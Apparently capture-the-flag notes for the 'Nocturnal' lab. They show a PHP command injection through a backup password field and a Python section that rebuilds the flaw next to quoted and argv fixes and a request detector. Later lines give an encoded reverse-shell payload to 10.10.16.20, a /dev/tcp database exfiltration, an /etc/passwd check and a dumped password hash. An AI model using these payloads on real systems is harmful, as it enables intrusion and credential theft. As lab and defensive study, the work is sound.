htb-nocturnal writeup notes
$command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " . > " . $logFile . " 2>&1 &";
With $password set to a newline followed by bash -c 'id', the concatenated command string becomes (the injected newline splits it into separate shell commands):
$command = "zip -x './backups/*' -r -P
bash -c 'id'
" . $backupFile . " . > " . $logFile . " 2>&1 &";
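Added example (not code from the writeup or from the target application): a Python re-creation of the same string-concatenation flaw next to two hardened forms, plus a small check a defender could run over captured request bodies. Names such as build_command_vulnerable, build_argv and flags_injection, and the sample form bodies, are constructed for illustration; shlex.quote stands in for PHP's escapeshellarg().

```python
import shlex
import urllib.parse

# Constructed example: the backup script splices an untrusted password straight
# into a shell command string, exactly as the PHP snippet on the page does.
def build_command_vulnerable(password, backup_file="backup.zip", log_file="backup.log"):
    return ("zip -x './backups/*' -r -P " + password + " " + backup_file
            + " . > " + log_file + " 2>&1 &")

# Hardened form 1: quote every untrusted value so the shell sees one word.
# shlex.quote here plays the role of PHP's escapeshellarg().
def build_command_quoted(password, backup_file="backup.zip", log_file="backup.log"):
    return ("zip -x './backups/*' -r -P " + shlex.quote(password) + " "
            + shlex.quote(backup_file) + " . > " + shlex.quote(log_file) + " 2>&1 &")

# Hardened form 2 (preferred): no shell at all. Pass an argv list, so no byte in
# the password can ever be interpreted as shell syntax.
def build_argv(password, backup_file="backup.zip"):
    return ["zip", "-x", "./backups/*", "-r", "-P", password, backup_file, "."]

# Show what the shell would receive as the password word: the token after -P.
def password_token(command_string):
    tokens = shlex.split(command_string)
    return tokens[tokens.index("-P") + 1]

# Detection: characters that never belong in a legitimate password parameter of
# this form and that would change the meaning of a shell command line.
SHELL_META = set("\n\r\t;|&`$(){}<>")

def flags_injection(form_body):
    """True if the urlencoded 'password' field carries shell metacharacters."""
    params = urllib.parse.parse_qs(form_body, keep_blank_values=True)
    return any(ch in SHELL_META for value in params.get("password", []) for ch in value)

if __name__ == "__main__":
    # Constructed input: newline-wrapped 'id', the same shape as the page's payload.
    injected = "\nid\n"
    print("vulnerable -P word:", repr(password_token(build_command_vulnerable(injected))))
    print("quoted     -P word:", repr(password_token(build_command_quoted(injected))))
    print("argv element      :", repr(build_argv(injected)[5]))
    for body in ("password=%0aid%0a&backup=x", "password=S3cret%21&backup=x"):
        print(body, "->", "suspicious" if flags_injection(body) else "ok")
```

In the vulnerable build the word after -P collapses to `id` and the rest of the injected text becomes its own command; in the quoted build the shell keeps the whole value, newlines included, as a single argument, and in the argv build there is no shell to confuse. The request check is coarse by design: it flags control characters and metacharacters in a field that should never contain them, which is what a WAF rule or log query for this endpoint would look for.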
%0abash%09-c%09%22bash+-i+%3e%26+%2fdev%2ftcp%2f10.10.16.20%2f4443+0%3e%261%22%0a
bash -i >& /dev/tcp/10.10.16.20/4443 0>&1
bash+-i+%3e%26+%2fdev%2ftcp%2f10.10.16.20%2f4443+0%3e%261
ls
password=%0abash%09-c%09%22bash%09-i%09%3e%26%09%2fdev%2ftcp%2f10.10.16.20%2f4443%090%3e%261%22%0a&backup=
nc -lvp 8888 > received_database.db
cat nocturnal_database.db > /dev/tcp/10.10.10.10/8888
Why this user? Running cat /etc/passwd | grep bash lists the accounts with a login shell; that is the user.
4|tobias|55c82b1ccd55ab219b3b109b07d5061d
Recovered by brute-forcing or looking up the hash.
The password is reused across accounts.